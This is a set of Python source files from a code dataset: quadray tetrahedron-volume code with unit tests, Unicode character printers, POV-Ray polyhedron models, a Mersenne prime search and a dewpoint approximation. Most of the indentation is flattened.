```python
from math import sqrt as rt2
from qrays import Qvector, Vector
import sys
R =0.5
D =1.0
S3 = pow(9/8, 0.5)
root2 = rt2(2)
root3 = rt2(3)
root5 = rt2(5)
root6 = rt2(6)
PHI = (1 + root5)/2.0
class Tetrahedron:
"""
Takes six edges of tetrahedron with faces
(a,b,d)(b,c,e)(c,a,f)(d,e,f) -- returns volume
if ivm and xyz
"""
def __init__(self, a, b, c, d, e, f):
# a,b,c,d,e,f = [Decimal(i) for i in (a,b,c,d,e,f)]
self.a, self.a2 = a, a**2
self.b, self.b2 = b, b**2
self.c, self.c2 = c, c**2
self.d, self.d2 = d, d**2
self.e, self.e2 = e, e**2
self.f, self.f2 = f, f**2
def ivm_volume(self):
ivmvol = ((self._addopen()
- self._addclosed()
- self._addopposite())/2) ** 0.5
return ivmvol
def xyz_volume(self):
xyzvol = 1/S3 * self.ivm_volume()
return xyzvol
def _addopen(self):
a2,b2,c2,d2,e2,f2 = self.a2, self.b2, self.c2, self.d2, self.e2, self.f2
sumval = f2*a2*b2
sumval += d2 * a2 * c2
sumval += a2 * b2 * e2
sumval += c2 * b2 * d2
sumval += e2 * c2 * a2
sumval += f2 * c2 * b2
sumval += e2 * d2 * a2
sumval += b2 * d2 * f2
sumval += b2 * e2 * f2
sumval += d2 * e2 * c2
sumval += a2 * f2 * e2
sumval += d2 * f2 * c2
return sumval
def _addclosed(self):
a2,b2,c2,d2,e2,f2 = self.a2, self.b2, self.c2, self.d2, self.e2, self.f2
sumval = a2 * b2 * d2
sumval += d2 * e2 * f2
sumval += b2 * c2 * e2
sumval += a2 * c2 * f2
return sumval
def _addopposite(self):
a2,b2,c2,d2,e2,f2 = self.a2, self.b2, self.c2, self.d2, self.e2, self.f2
sumval = a2 * e2 * (a2 + e2)
sumval += b2 * f2 * (b2 + f2)
sumval += c2 * d2 * (c2 + d2)
return sumval
def make_tet(v0,v1,v2):
"""
three edges from any corner, remaining three edges computed
"""
tet = Tetrahedron(v0.length(), v1.length(), v2.length(),
(v0-v1).length(), (v1-v2).length(), (v2-v0).length())
return tet.ivm_volume(), tet.xyz_volume()
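# Quick sanity checks of the edge-order convention (try these in a REPL;
# the unit tests below assert the same values):
#   Tetrahedron(1, 1, 1, 1, 1, 1).ivm_volume()  -> 1.0 (unit-edge tetrahedron)
#   make_tet(Qvector((1,0,0,0)), Qvector((0,1,0,0)), Qvector((0,0,1,0)))
#                                               -> (~0.25, ~0.2357) quadrant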
class Triangle:
def __init__(self, a, b, c):
self.a = a
self.b = b
self.c = c
def ivm_area(self):
ivmarea = self.xyz_area() * 1/rt2(3)
return ivmarea
def xyz_area(self):
"""
Heron's Formula, without the 1/4
"""
a,b,c = self.a, self.b, self.c
xyzarea = rt2((a+b+c) * (-a+b+c) * (a-b+c) * (a+b-c))
return xyzarea
def make_tri(v0,v1):
"""
three edges from any corner, remaining three edges computed
"""
tri = Triangle(v0.length(), v1.length(), (v1-v0).length())
return tri.ivm_area(), tri.xyz_area()
R = 0.5
D = 1.0
import unittest
class Test_Tetrahedron(unittest.TestCase):
def test_unit_volume(self):
tet = Tetrahedron(D, D, D, D, D, D)
self.assertEqual(tet.ivm_volume(), 1, "Volume not 1")
def test_e_module(self):
e0 = D
e1 = root3 * PHI**-1
e2 = rt2((5 - root5)/2)
e3 = (3 - root5)/2
e4 = rt2(5 - 2*root5)
e5 = 1/PHI
tet = Tetrahedron(e0, e1, e2, e3, e4, e5)
self.assertTrue(1/23 > tet.ivm_volume()/8 > 1/24, "Wrong E-mod")
def test_unit_volume2(self):
tet = Tetrahedron(R, R, R, R, R, R)
self.assertAlmostEqual(tet.xyz_volume(), 0.117851130)
def test_unit_volume3(self):
tet = Tetrahedron(R, R, R, R, R, R)
self.assertAlmostEqual(tet.ivm_volume(), 0.125)
def test_phi_edge_tetra(self):
tet = Tetrahedron(D, D, D, D, D, PHI)
self.assertAlmostEqual(float(tet.ivm_volume()), 0.70710678)
def test_right_tetra(self):
e = pow((root3/2)**2 + (root3/2)**2, 0.5) # right tetrahedron
tet = Tetrahedron(D, D, D, D, D, e)
self.assertAlmostEqual(tet.xyz_volume(), 1)
def test_quadrant(self):
qA = Qvector((1,0,0,0))
qB = Qvector((0,1,0,0))
qC = Qvector((0,0,1,0))
tet = make_tet(qA, qB, qC)
self.assertAlmostEqual(tet[0], 0.25)
def test_octant(self):
x = Vector((R, 0, 0))
y = Vector((0, R, 0))
z = Vector((0, 0, R))
tet = make_tet(x,y,z)
self.assertAlmostEqual(tet[1], 1/6, 5) # good to 5 places
def test_quarter_octahedron(self):
a = Vector((D,0,0))
b = Vector((0,D,0))
c = Vector((R,R,root2/2))
tet = make_tet(a, b, c)
self.assertAlmostEqual(tet[0], 1, 5) # good to 5 places
def test_xyz_cube(self):
a = Vector((R, 0.0, 0.0))
b = Vector((0.0, R, 0.0))
c = Vector((0.0, 0.0, R))
R_octa = make_tet(a,b,c)
self.assertAlmostEqual(6 * R_octa[1], 1, 4) # good to 4 places
def test_s3(self):
D_tet = Tetrahedron(D, D, D, D, D, D)
a = Vector((R, 0.0, 0.0))
b = Vector((0.0, R, 0.0))
c = Vector((0.0, 0.0, R))
R_cube = 6 * make_tet(a,b,c)[1]
self.assertAlmostEqual(D_tet.xyz_volume() * S3, R_cube, 4)
def test_martian(self):
p = Qvector((2,1,0,1))
q = Qvector((2,1,1,0))
r = Qvector((2,0,1,1))
result = make_tet(5*q, 2*p, 2*r)
self.assertAlmostEqual(result[0], 20, 7)
def test_area_martian1(self):
p = Qvector((2,1,0,1))
q = Qvector((2,1,1,0))
result = p.area(q)
self.assertAlmostEqual(result, 1)
def test_area_martian2(self):
p = 3 * Qvector((2,1,0,1))
q = 4 * Qvector((2,1,1,0))
result = p.area(q)
self.assertAlmostEqual(result, 12)
def test_area_martian3(self):
qx = Vector((D,0,0)).quadray()
qy = Vector((R,rt2(3)/2,0)).quadray()
result = qx.area(qy)
self.assertAlmostEqual(result, 1, 7)
def test_area_earthling1(self):
vx = Vector((1,0,0))
vy = Vector((0,1,0))
result = vx.area(vy)
self.assertAlmostEqual(result, 1)
def test_area_earthling2(self):
vx = Vector((2,0,0))
vy = Vector((1,rt2(3),0))
result = vx.area(vy)
self.assertAlmostEqual(result, 2*rt2(3))
def test_phi_tet(self):
"edges from common vertex: phi, 1/phi, 1"
p = Vector((1, 0, 0))
q = Vector((1, 0, 0)).rotz(60) * PHI
r = Vector((0.5, root3/6, root6/3)) * 1/PHI
result = make_tet(p, q, r)
self.assertAlmostEqual(result[0], 1, 7)
def test_phi_tet_2(self):
p = Qvector((2,1,0,1))
q = Qvector((2,1,1,0))
r = Qvector((2,0,1,1))
result = make_tet(PHI*q, (1/PHI)*p, r)
self.assertAlmostEqual(result[0], 1, 7)
def test_phi_tet_3(self):
T = Tetrahedron(PHI, 1/PHI, 1.0,
root2, root2/PHI, root2)
result = T.ivm_volume()
self.assertAlmostEqual(result, 1, 7)
def test_koski(self):
a = 1
b = PHI ** -1
c = PHI ** -2
d = (root2) * PHI ** -1
e = (root2) * PHI ** -2
f = (root2) * PHI ** -1
T = Tetrahedron(a,b,c,d,e,f)
result = T.ivm_volume()
self.assertAlmostEqual(result, PHI ** -3, 7)
class Test_Triangle(unittest.TestCase):
def test_unit_area1(self):
tri = Triangle(D, D, D)
self.assertEqual(tri.ivm_area(), 1)
def test_unit_area2(self):
tri = Triangle(2, 2, 2)
self.assertEqual(tri.ivm_area(), 4)
def test_xyz_area3(self):
tri = Triangle(D, D, D)
self.assertEqual(tri.xyz_area(), rt2(3))
def test_xyz_area4(self):
v1 = Vector((D, 0, 0))
v2 = Vector((0, D, 0))
xyz_area = make_tri(v1, v2)[1]
self.assertAlmostEqual(xyz_area, 2)
def test_xyz_area5(self):
tri = Triangle(R, R, R)
self.assertAlmostEqual(tri.xyz_area(), (root3)/4)
def command_line():
args = sys.argv[1:]
try:
        args = [float(x) for x in args]  # six edge lengths as floats
        t = Tetrahedron(*args)
    except (TypeError, ValueError):      # wrong count or non-numeric input
        t = Tetrahedron(1,1,1,1,1,1)
        print("defaults used")
print(t.ivm_volume())
print(t.xyz_volume())
if __name__ == "__main__":
if len(sys.argv)==7:
command_line()
else:
unittest.main()
``` |
{
"source": "4dsolutions/python_camp",
"score": 3
} |
#### File: 4dsolutions/python_camp/unicode_fun.py
```python
import sys  # needed by html(); previously only imported under __main__
def cherokee():
"""
U+13A0 – U+13FF (5024–5119)
http://www.alanwood.net/unicode/cherokee.html
(page only shows up to 13F4)
"""
for codepoint in range(int('13A0', 16), int('13F4', 16)):
print(chr(codepoint), end="")
print("----")
def emoji():
for codepoint in range(int('1F600', 16), int('1F620', 16)):
print(chr(codepoint), end=" ")
print("----")
def food_emoji():
emoji = [chr(codepoint) for codepoint in range(127812, 127857)]
for e in emoji:
print(e, end=" ")
print("----")
def hebrew():
"""
http://www.alanwood.net/unicode/hebrew.html
U+0590 – U+05FF (1424–1535)
"""
global letters
letters = [chr(codepoint)
for codepoint in
range(int('05D0', 16),
int('05EA', 16))]
print("".join(letters))
print("----")
def greek():
for codepoint in range(int('03D0', 16), int('03FF', 16)):
print(chr(codepoint), end="")
print("----")
def korean():
for codepoint in range(int('BB00', 16), int('BBAF', 16)):
print(chr(codepoint), end="")
print("----")
def arabic():
"""
http://www.alanwood.net/unicode/arabic.html
U+0600 – U+06FF (1536–1791)
"""
print(" ".join([chr(codepoint)
for codepoint in range(int('0600', 16),
int('06FF', 16))]))
print("----")
def main():
print("EMOJI:\n\n")
emoji()
print("HEBREW:\n\n")
hebrew()
print("GREEK & COPTIC:\n\n")
greek()
print("KOREAN:\n\n")
korean()
print("ARABIC:\n\n")
arabic()
print()
print("CHEROKEE:\n\n")
cherokee()
html_top = """<!DOCTYPE html>
<html>
<head>
<title>Unicode Stuff</title>
</head>
<body>
<h1>Unicode Stuff</h1>
<p>"""
# Make an HTML sandwich!
html_bottom = """</p>
</body>
</html>"""
def html():
"""
This is a fancy advanced option. The point of saving all the
output to an HTML file is maybe your browser will do an even
better job of rendering these unicode characters, worth a try.
https://kite.com/python/answers/how-to-redirect-print-output-to-a-text-file-in-python
https://www.blog.pythonlibrary.org/2016/06/16/python-101-redirecting-stdout/
"""
original = sys.stdout
sys.stdout = open("unicode.html", "w", encoding='utf-8')
# HTML sandwich
print(html_top)
main() # sandwich meat!
print(html_bottom, end="")
sys.stdout.flush()
sys.stdout.close()
sys.stdout = original
# Now lets put in some line breaks, since HTML
# pays no attention to newlines \n
with open("unicode.html", "r", encoding='utf-8') as the_file:
text = the_file.read().replace(":\n\n", "<br/>").replace("----","<br/><br/>")
with open("unicode.html", "w", encoding='utf-8') as the_file:
the_file.write(text)
print("OK, open unicode.html in browser")
def the_help():
options = "\n".join(sorted(menu_options.keys()))
print("$ python -m unicode_fun name\n"
"where name is:\n",
options + "\n", sep="")
menu_options = {
"arabic": arabic,
"cherokee": cherokee,
"hebrew": hebrew,
"greek": greek,
"korean": korean,
"emoji": emoji,
"food" : food_emoji,
"all": main,
"html": html,
"--help": the_help,
"-h": the_help}
if __name__ == "__main__":
import sys
if len(sys.argv)>1:
requested_unicode = sys.argv[1]
# print(sys.argv)
if requested_unicode in menu_options:
# don't just eval() whatever is passed in!
menu_options[requested_unicode]()
else:
the_help()
``` |
{
"source": "4dsolutions/School_of_Tomorrow",
"score": 3
} |
#### File: 4dsolutions/School_of_Tomorrow/flextegrity.py
```python
class Polyhedron:
"""
Designed to be subclassed, not used directly
"""
def scale(self, scalefactor):
if hasattr(self, "volume"):
self.volume = scalefactor ** 3
newverts = {}
for v in self.vertexes:
newverts[v] = self.vertexes[v] * scalefactor
newme = type(self)()
newme.vertexes = newverts # substitutes new guts
newme.edges = newme._distill() # update edges to use new verts
return newme
__mul__ = __rmul__ = scale
def translate(self, vector):
newverts = {}
for v in self.vertexes:
newverts[v] = self.vertexes[v] + vector
newme = type(self)()
newme.vertexes = newverts # substitutes new tent stakes
if hasattr(self, "center"): # shift center before suppress!
newme.center = self.center + vector
if hasattr(self, "suppress"):
newme.suppress = self.suppress
if newme.suppress:
newme.faces = newme._suppress()
newme.edges = newme._distill() # update edges to use new verts
return newme
__add__ = __radd__ = translate
def _distill(self):
edges = []
unique = set()
for f in self.faces:
for pair in zip(f , f[1:] + (f[0],)):
unique.add( tuple(sorted(pair)) )
for edge in unique:
edges.append( Edge(self.vertexes[edge[0]],
self.vertexes[edge[1]]) )
return edges
class Edge:
"""
Edges are defined by two Vectors (above) and express as cylinder via draw().
"""
def __init__(self, v0, v1):
self.v0 = v0 # actual coordinates, not a letter label
self.v1 = v1
def __repr__(self):
return 'Edge from %s to %s' % (self.v0, self.v1)
def draw_vert(v, c, r, t):
v = v.xyz
x,y,z = v.x, v.y, v.z
data = "< %s, %s, %s >" % (x,y,z), r, c
template = ("sphere { %s, %s texture "
"{ pigment { color %s } } no_shadow }")
print(template % data, file=t)
def draw_face(f, c, t): pass
def draw_edge(e, c, r, t):
v = e.v0.xyz
v0 = "< %s, %s, %s >" % (v.x, v.y, v.z)
v = e.v1.xyz
v1 = "< %s, %s, %s >" % (v.x, v.y, v.z)
data = (v0, v1, r, c)
template = ("cylinder { %s, %s, %s texture "
"{pigment { color %s } } no_shadow }")
print(template % data, file=t)
def draw_poly(p, the_file, v=True, f=False, e=True):
ec = p.edge_color
er = p.edge_radius
vc = p.vert_color
vr = p.vert_radius
fc = p.face_color
if v:
for v in p.vertexes.values():
draw_vert(v, vc, vr, the_file)
if f:
for f in p.faces:
draw_face(f, fc, the_file)
if e:
for e in p.edges:
draw_edge(e, ec, er, the_file)
import math
from qrays import Qvector, Vector
PHI = (1 + math.sqrt(5))/2.0
ORIGIN = Qvector((0,0,0,0))
A = Qvector((1,0,0,0))
B = Qvector((0,1,0,0))
C = Qvector((0,0,1,0))
D = Qvector((0,0,0,1))
E,F,G,H = B+C+D, A+C+D, A+B+D, A+B+C
I,J,K,L,M,N = A+B, A+C, A+D, B+C, B+D, C+D
O,P,Q,R,S,T = I+J, I+K, I+L, I+M, N+J, N+K
U,V,W,X,Y,Z = N+L, N+M, J+L, L+M, M+K, K+J
# OPPOSITE DIAGONALS
# ZY WX
# RV OS
# TU PQ
control = (Z - T).length()
midface = (Z + Y)
gold = 0.5 * PHI * midface/midface.length()
Zi = gold + J/J.length() * control/2
Yi = gold + M/M.length() * control/2
midface = (W + X)
gold = 0.5 * PHI * midface/midface.length()
Wi = gold + J/J.length() * control/2
Xi = gold + M/M.length() * control/2
midface = (R + V)
gold = 0.5 * PHI * midface/midface.length()
Ri = gold + I/I.length() * control/2
Vi = gold + N/N.length() * control/2
midface = (O + S)
gold = 0.5 * PHI * midface/midface.length()
Oi = gold + I/I.length() * control/2
Si = gold + N/N.length() * control/2
midface = (T + U)
gold = 0.5 * PHI * midface/midface.length()
Ti = gold + K/K.length() * control/2
Ui = gold + L/L.length() * control/2
midface = (P + Q)
gold = 0.5 * PHI * midface/midface.length()
Pi = gold + K/K.length() * control/2
Qi = gold + L/L.length() * control/2
class Tetrahedron(Polyhedron):
"""
Tetrahedron
"""
def __init__(self):
# POV-Ray
self.edge_color = "rgb <{}, {}, {}>".format(1, 165/255, 0) # orange
self.edge_radius= 0.03
self.vert_color = "rgb <{}, {}, {}>".format(1, 165/255, 0) # orange
self.vert_radius= 0.03
self.face_color = "rgb <0, 0, 0>" # not used
verts = dict(a = Qvector((1,0,0,0)), #A
b = Qvector((0,1,0,0)), #B
c = Qvector((0,0,1,0)), #C
d = Qvector((0,0,0,1))) #D
self.name = "Tetrahedron"
self.volume = 1 # per Concentric Hierarchy
self.center = ORIGIN
# 4 vertices
self.vertexes = verts
# 4 faces
self.faces = (('a','b','c'),('a','c','d'),
('a','d','b'),('b','d','c'))
self.edges = self._distill()
class InvTetrahedron(Polyhedron):
"""
Inverse Tetrahedron
"""
def __init__(self):
# POV-Ray
self.edge_color = "rgb <{}, {}, {}>".format(0, 0, 0) # black
self.edge_radius= 0.03
self.vert_color = "rgb <{}, {}, {}>".format(0, 0, 0) # black
self.vert_radius= 0.03
self.face_color = "rgb <0, 0, 0>" # not used
verts = dict(e = -Qvector((1,0,0,0)), #E
f = -Qvector((0,1,0,0)), #F
g = -Qvector((0,0,1,0)), #G
h = -Qvector((0,0,0,1))) #H
self.name = "InvTetrahedron"
self.volume = 1 # per Concentric Hierarchy
self.center = ORIGIN
# 4 vertices
self.vertexes = verts
# 4 faces
self.faces = (('e','f','g'),('e','g','h'),
('e','h','f'),('f','h','g'))
self.edges = self._distill()
class Cube (Polyhedron):
"""
Cube
"""
def __init__(self):
# POV-Ray
self.edge_color = "rgb <0, 1, 0>"
self.edge_radius= 0.03
self.vert_color = "rgb <0, 1, 0>"
self.vert_radius= 0.03
self.face_color = "rgb <0, 0, 0>"
verts = {}
for vert_label in "abcdefgh":
# keep the uppercase A-Z universe (namespace) unobstructed
verts[vert_label] = eval(vert_label.upper())
self.name = "Cube"
self.volume = 3 # per Concentric Hierarchy
self.center = ORIGIN
# 8 vertices
self.vertexes = verts
# 6 faces
self.faces = (('a','f','c','h'),('h','c','e','b'),
('b','e','d','g'),('g','d','f','a'),
('c','f','d','e'),('a','h','b','g'))
self.edges = self._distill()
class Cuboid (Polyhedron):
"""
Cuboid with height, width, depth = sqrt(1), sqrt(2), sqrt(4)
"""
def __init__(self):
# POV-Ray
self.edge_color = "rgb <255/255, 20/255, 147/255>"
self.edge_radius= 0.03
self.vert_color = "rgb <255/255, 20/255, 147/255>"
self.vert_radius= 0.03
self.face_color = "rgb <0, 0, 0>"
verts = {}
verts['A'] = Vector(( 1, 0.5, math.sqrt(2)/2))
verts['B'] = Vector(( 1, -0.5, math.sqrt(2)/2))
verts['C'] = Vector(( 1, -0.5, -math.sqrt(2)/2))
verts['D'] = Vector(( 1, 0.5, -math.sqrt(2)/2))
verts['E'] = Vector((-1, 0.5, math.sqrt(2)/2))
verts['F'] = Vector((-1, -0.5, math.sqrt(2)/2))
verts['G'] = Vector((-1, -0.5, -math.sqrt(2)/2))
verts['H'] = Vector((-1, 0.5, -math.sqrt(2)/2))
self.name = "Cuboid"
self.volume = 8 # per Concentric Hierarchy
self.center = ORIGIN
# 8 vertices
self.vertexes = verts
# 6 faces
self.faces = (('A','B','C','D'),('E','F','G','H'),
('A','E','F','B'),('D','H','G','C'),
('A','E','H','D'),('B','F','G','C'))
self.edges = self._distill()
class Octahedron (Polyhedron):
"""
Octahedron
"""
def __init__(self):
# POV-Ray
self.edge_color = "rgb <1, 0, 0>"
self.edge_radius= 0.03
self.vert_color = "rgb <1, 0, 0>"
self.vert_radius= 0.03
self.face_color = "rgb <0, 0, 0>"
verts = {}
for vert_label in "ijklmn":
# keep the uppercase A-Z universe unobstructed
verts[vert_label] = eval(vert_label.upper())
self.name = "Octahedron"
self.volume = 4 # per Concentric Hierarchy
self.center = ORIGIN
# 6 vertices
self.vertexes = verts
# 8 faces
self.faces = (('j','k','i'),('j','i','l'),('j','l','n'),('j','n','k'),
('m','k','i'),('m','i','l'),('m','l','n'),('m','n','k'))
self.edges = self._distill()
class RD (Polyhedron):
"""
Rhombic Dodecahedron
"""
def __init__(self):
self.edge_color = "rgb <0, 0, 1>"
self.edge_radius= 0.03
self.vert_color = "rgb <0, 0, 1>"
self.vert_radius= 0.03
self.face_color = "rgb <0, 0, 0>"
verts = {}
for vert_label in "abcdefghijklmn":
# keep the uppercase A-Z universe unobstructed
verts[vert_label] = eval(vert_label.upper())
self.name = "RD"
self.volume = 6 # per Concentric Hierarchy
self.center = ORIGIN
# 14 vertices
self.vertexes = verts
# 12 faces
# I,J,K,L,M,N = A+B, A+C, A+D, B+C, B+D, C+D
self.faces = (('j','f','k','a'),('j','f','n','c'),('j','c','l','h'),('j','h','i','a'),
('m','d','k','g'),('m','d','n','e'),('m','e','l','b'),('m','b','i','g'),
('k','d','n','f'),('n','c','l','e'),('l','h','i','b'),('i','a','k','g'))
self.edges = self._distill()
class Icosahedron (Polyhedron):
def __init__(self):
# 8 vertices
self.edge_color = "rgb <0, 1, 1>"
self.edge_radius= 0.03
self.vert_color = "rgb <0, 1, 1>"
self.vert_radius= 0.03
self.face_color = "rgb <0, 0, 0>"
self.vertexes = dict(o = Oi,
p = Pi,
q = Qi,
r = Ri,
s = Si,
t = Ti,
u = Ui,
v = Vi,
w = Wi,
x = Xi,
y = Yi,
z = Zi)
self.name = "Icosahedron"
self.volume = 18.51
self.center = ORIGIN
# 20 faces
# OPPOSITE DIAGONALS of cubocta
# ZY WX
# RV OS
# TU PQ
self.faces = (('o','w','s'),('o','z','s'),
('z','p','y'),('z','t','y'),
('t','v','u'),('t','s','u'),
('w','q','x'),('w','u','x'),
('p','o','q'),('p','r','q'),
('r','y','v'),('r','x','v'),
('z','s','t'),('t','y','v'),
('y','p','r'),('r','q','x'),
('x','u','v'),('u','s','w'),
('w','q','o'),('o','z','p'))
self.edges = self._distill()
class Cuboctahedron (Polyhedron):
def __init__(self):
# 8 vertices
self.edge_color = "rgb <1, 1, 0>"
self.edge_radius= 0.03
self.vert_color = "rgb <1, 1, 0>"
self.vert_radius= 0.03
self.face_color = "rgb <0, 0, 0>"
self.vertexes = dict(o = O,
p = P,
q = Q,
r = R,
s = S,
t = T,
u = U,
v = V,
w = W,
x = X,
y = Y,
z = Z)
self.name = "Cuboctahedron"
self.volume = 20
self.center = ORIGIN
        # 14 faces: 6 squares + 8 triangles
self.faces = (('o','w','s','z'),('z','p','y','t'),
('t','v','u','s'),('w','q','x','u'),
('o','p','r','q'),('r','y','v','x'),
('z','s','t'),('t','y','v'),
('y','p','r'),('r','q','x'),
('x','u','v'),('u','s','w'),
('w','q','o'),('o','z','p'))
self.edges = self._distill()
class Struts(Polyhedron):
def __init__(self, c=None, ico=None, suppress=False):
self.edge_color = "rgb <1, 0, 0>"
self.edge_radius= 0.02
self.vert_color = "rgb <1, 0, 0>"
self.vert_radius= 0.02
self.face_color = "rgb <0, 0, 0>"
self.suppress = suppress
if not c and not ico:
c = Cube()
ico = Icosahedron()
self.vertexes = dict(
# cube mid-edges
af = (c.vertexes['a'] + c.vertexes['f'])/2,
ag = (c.vertexes['a'] + c.vertexes['g'])/2,
ah = (c.vertexes['a'] + c.vertexes['h'])/2,
be = (c.vertexes['b'] + c.vertexes['e'])/2,
bh = (c.vertexes['b'] + c.vertexes['h'])/2,
bg = (c.vertexes['b'] + c.vertexes['g'])/2,
ce = (c.vertexes['c'] + c.vertexes['e'])/2,
cf = (c.vertexes['c'] + c.vertexes['f'])/2,
ch = (c.vertexes['c'] + c.vertexes['h'])/2,
de = (c.vertexes['d'] + c.vertexes['e'])/2,
df = (c.vertexes['d'] + c.vertexes['f'])/2,
dg = (c.vertexes['d'] + c.vertexes['g'])/2,
# icosa mid-edges
# OPPOSITE DIAGONALS of cubocta
# ZY WX
# RV OS
# TU PQ
os = (ico.vertexes['o'] + ico.vertexes['s'])/2,
pq = (ico.vertexes['p'] + ico.vertexes['q'])/2,
rv = (ico.vertexes['r'] + ico.vertexes['v'])/2,
tu = (ico.vertexes['t'] + ico.vertexes['u'])/2,
wx = (ico.vertexes['w'] + ico.vertexes['x'])/2,
yz = (ico.vertexes['y'] + ico.vertexes['z'])/2
)
self.name = 'struts'
self.center = ico.center
self.faces = (('os', 'af'), ('os', 'ch'),
('rv', 'be'), ('rv', 'dg'),
('tu', 'cf'), ('tu', 'de'),
('pq', 'ah'), ('pq', 'bg'),
('yz', 'ag'), ('yz', 'df'),
('wx', 'bh'), ('wx', 'ce'))
if self.suppress:
self.faces = self._suppress()
self.edges = self._distill()
def _suppress(self):
"""
A global IVM of integral Qray positions is expected for
the suppress feature to work. This could be an n-frequency
cuboctahedron or perhaps a layered tetrahedron of half-
octahedron of balls.
"""
global IVM
keep = []
# print("Suppressing disconnected edges")
for f in self.faces:
# print(f, self.center)
neighbor = self.center + eval(f[1][0].upper()) + eval(f[1][1].upper())
# print("Neighbor=", neighbor)
for layer in IVM:
if neighbor in IVM[layer]:
# print("Bing!")
keep.append(f)
break
else:
pass
# print("Not found")
return keep
from itertools import permutations
g = permutations((2,1,1,0))
unique = {p for p in g} # set comprehension
def twelve_around_one(p):
twelve = [ ]
for v in unique:
trans_vector = Qvector(v)
twelve.append(p + trans_vector)
return twelve
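# Note: the 12 distinct permutations of (2,1,1,0), read as quadray (Qvector)
# coordinates, are the directions to the 12 nearest neighbours of a ball in
# the IVM/CCP packing -- hence "twelve around one".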
pov_header = \
"""
// Persistence of Vision Ray Tracer Scene Description File
// File: xyz.pov
// Vers: 3.6
// Desc: test file
// Date: Sat Sep 7 09:49:33 2019
// Auth: me
// ==== Standard POV-Ray Includes ====
#include "colors.inc" // Standard Color definitions
// include "textures.inc" // Standard Texture definitions
// include "functions.inc" // internal functions usable in user defined functions
// ==== Additional Includes ====
// Don't have all of the following included at once, it'll cost memory and time
// to parse!
// --- general include files ---
// include "chars.inc" // A complete library of character objects, by <NAME>
// include "skies.inc" // Ready defined sky spheres
// include "stars.inc" // Some star fields
// include "strings.inc" // macros for generating and manipulating text strings
// --- textures ---
// include "finish.inc" // Some basic finishes
// include "glass.inc" // Glass textures/interiors
// include "golds.inc" // Gold textures
// include "metals.inc" // Metallic pigments, finishes, and textures
// include "stones.inc" // Binding include-file for STONES1 and STONES2
// include "stones1.inc" // Great stone-textures created by <NAME>
// include "stones2.inc" // More, done by <NAME> and <NAME>
// include "woodmaps.inc" // Basic wooden colormaps
// include "woods.inc" // Great wooden textures created by <NAME> and <NAME>
global_settings {assumed_gamma 1.0}
global_settings {ambient_light rgb<1, 1, 1> }
// perspective (default) camera
camera {
location <4, 0.1, 0.2>
rotate <35, 35, 10.0>
look_at <0.0, 0.0, 0.0>
right x*image_width/image_height
}
// create a regular point light source
light_source {
0*x // light's position (translated below)
color rgb <1,1,1> // light's color
translate <-20, 15, 10>
}
// create a regular point light source
light_source {
0*x // light's position (translated below)
color rgb <1,1,1> // light's color
translate <20, -15, -10>
}
background { color rgb <1.0, 1.0, 1.0> }
"""
```
#### File: 4dsolutions/School_of_Tomorrow/mersennes.py
```python
import random
_primes = [2] # global list of primes
def iseven(n):
"""Return true if n is even."""
return n%2==0
def isodd(n):
"""Return true if n is odd."""
return not iseven(n)
def divtrial(n):
"""
    Trial-division check of whether a number is prime."""
verdict = 1 # default is "yes, add to list"
cutoff = n**0.5 # 2nd root of n
for i in _primes:
if not n%i: # if no remainder
verdict = 0 # then we _don't_ want to add
break
if i >= cutoff: # stop trying to divide by
break # lower primes when p**2 > n
return verdict
def isprime(n):
"""
Divide by primes until n proves composite or prime.
Brute force algorithm, will wimp out for humongous n
return 0 if n is divisible
return 1 if n is prime"""
rtnval = 1
if n == 2: return 1
if n < 2 or iseven(n): return 0
maxnb = n ** 0.5 # 2nd root of n
# if n < largest prime on file, check for n in list
if n <= _primes[-1]: rtnval = (n in _primes)
# if primes up to root(n) on file, run divtrial (a prime test)
elif maxnb <= _primes[-1]: rtnval = divtrial(n)
else:
rtnval = divtrial(n) # check divisibility by primes so far
if rtnval==1: # now, if still tentatively prime...
# start with highest prime so far
i = _primes[-1]
# and add...
i = i + 1 + isodd(i)*1 # next odd number
while i <= maxnb:
if divtrial(i): # test of primehood
_primes.append(i) # append to list if prime
if not n%i: # if n divisible by latest prime
rtnval = 0 # then we're done
break
i=i+2 # next odd number
return rtnval
def pptest(n):
"""
Simple implementation of Miller-Rabin test for
determining probable primehood.
"""
bases = [random.randrange(2,50000) for _ in range(90)]
    # if any of the bases divides n, n is composite and we're done
if n<=1: return 0
for b in bases:
if n%b==0: return 0
tests,s = 0,0
m = n-1
# turning (n-1) into (2**s) * m
while not m&1: # while m is even
m >>= 1
s += 1
for b in bases:
tests += 1
isprob = algP(m,s,b,n)
if not isprob: break
if isprob: return (1-(1./(4**tests)))
else: return 0
def algP(m,s,b,n):
"""
based on Algorithm P in Donald Knuth's 'Art of
Computer Programming' v.2 pg. 395
"""
result = 0
y = pow(b,m,n)
for j in range(s):
if (y==1 and j==0) or (y==n-1):
result = 1
break
y = pow(y,2,n)
return result
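# Illustrative decomposition used by pptest/algP: for n = 2**13 - 1 = 8191,
# n - 1 = 8190 = 2**1 * 4095, so s = 1 and m = 4095; algP then tests whether
# pow(b, 4095, n) equals 1 or n - 1 for each random base b.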
m = 1
for n in range(650):
candidate = 2**n - 1
if len(str(candidate)) < 10:
if isprime(candidate):
print(f"M{m} = 2**{n}-1 = {candidate}")
m += 1
else:
if pptest(2**n-1):
print(f"M{m} = 2**{n}-1 = {candidate}")
m += 1
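# Sanity check: the first few Mersenne primes this loop should report are
# M1 = 2**2-1 = 3
# M2 = 2**3-1 = 7
# M3 = 2**5-1 = 31
# M4 = 2**7-1 = 127
# M5 = 2**13-1 = 8191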
``` |
{
"source": "4dvar/py_meteo_tools",
"score": 4
} |
#### File: py_meteo_tools/py_meteo_tools/dewpoint.py
```python
import sys
import numpy as np
# approximation valid for
# 0 degrees Celsius < T < 60 degrees Celsius
# 1% < RH < 100%
# 0 degrees Celsius < Td < 50 degrees Celsius
# constants
a = 17.271
b = 237.7 # in units of degrees Celsius
def dewpoint_approximation(T,RH):
"""
PURPOSE:
    approximate the dewpoint given temperature and relative humidity
    INPUT:
    T: temperature (degrees Celsius)
    RH: relative humidity (%)
"""
Td = (b * gamma(T,RH)) / (a - gamma(T,RH))
return Td
def gamma(T,RH):
"""
PURPOSE:
    helper function used to calculate the dewpoint
    INPUT:
    T: temperature (degrees Celsius)
    RH: relative humidity (%)
"""
g = (a * T / (b + T)) + np.log(RH/100.0)
return g
if __name__ == '__main__':
# sys.argv[0] is program name
T=float(sys.argv[1])
RH=float(sys.argv[2])
Td = dewpoint_approximation(T,RH)
print('T, RH: '+str(T)+u'°C, '+str(RH)+'%')
